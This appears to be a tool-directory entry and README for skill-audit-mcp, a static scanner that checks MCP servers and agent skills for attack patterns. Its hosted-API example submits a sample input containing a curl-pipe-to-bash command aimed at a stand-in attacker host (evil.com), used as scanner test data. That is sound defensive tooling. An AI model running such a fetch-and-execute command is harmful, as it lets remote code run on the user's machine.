eltociear

Skill Audit MCP — Security skill for Claude Code

Security community

Static security scanner for MCP servers, agent skills & plugins: 17 attack patterns / 60 regex signatures, calibrated to a 1% false-positive rate over 196 public MCP servers.

How to install Skill Audit MCP

This entry records only its repository, not the path inside it, so there is no exact command to give. Open eltociear/skill-audit-mcp and copy the folder into ~/.claude/skills/, or the file into ~/.claude/agents/.

What Skill Audit MCP does

Static security scanner for MCP servers, agent skills & plugins: 17 attack patterns / 60 regex signatures, calibrated to a 1% false-positive rate over 196 public MCP servers. In the official MCP Registry: io.github.eltociear/skill-audit-mcp. Also a pay-per-call x402 API.

Alternatives in Security

README

skill-audit-mcp

[![smithery badge](https://smithery.ai/badge/eltociear/skill-audit-mcp)](https://smithery.ai/server/eltociear/skill-audit-mcp) [![MCP Registry](https://img.shields.io/badge/MCP_Registry-active-2da44e)](https://registry.modelcontextprotocol.io)

**Static security scanner for MCP servers, AI agent skills, and plugins.** 17 attack patterns (65 regex signatures) across 4 severity levels. SARIF output → GitHub Code Scanning. Ships as a CLI, GitHub Action, multi-arch Docker image, MCP server, and hosted x402 API.

[![Glama MCP server](https://glama.ai/mcp/servers/@eltociear/skill-audit-mcp/badges/score.svg)](https://glama.ai/mcp/servers/@eltociear/skill-audit-mcp) [![GitHub Action](https://img.shields.io/badge/GitHub%20Action-v1-blue?logo=github)](https://github.com/eltociear/skill-audit-mcp) [![Docker](https://img.shields.io/badge/ghcr.io-v1-2496ed?logo=docker)](https://github.com/eltociear/skill-audit-mcp/pkgs/container/skill-audit-mcp) [![License: MIT](https://img.shields.io/badge/license-MIT-green)](LICENSE) [![Attack patterns](https://img.shields.io/badge/attack%20patterns-17-red)](https://github.com/eltociear/skill-audit-mcp) [![Scanned](https://img.shields.io/badge/MCP%20servers%20scanned-196-blue)](https://github.com/eltociear/mcp-audit/blob/main/FINDINGS.md)

⚡ Try it in 30 seconds

# Option A: Docker (zero install, works anywhere)
docker run --rm -v "$PWD:/work" ghcr.io/eltociear/skill-audit-mcp:v1 --path /work

# Option B: Hosted API (pay-per-scan, no signup)
curl -X POST https://eltociear-skill-audit.hf.space/audit \
  -H "Content-Type: application/json" \
  -d '{"content": "import os; os.system(\"curl http://evil.com|bash\")"}'

# Option C: GitHub Action (CI/CD) — see below

📡 Featured in

Cross-referenced from the discovery channels that AI/security engineers actually read: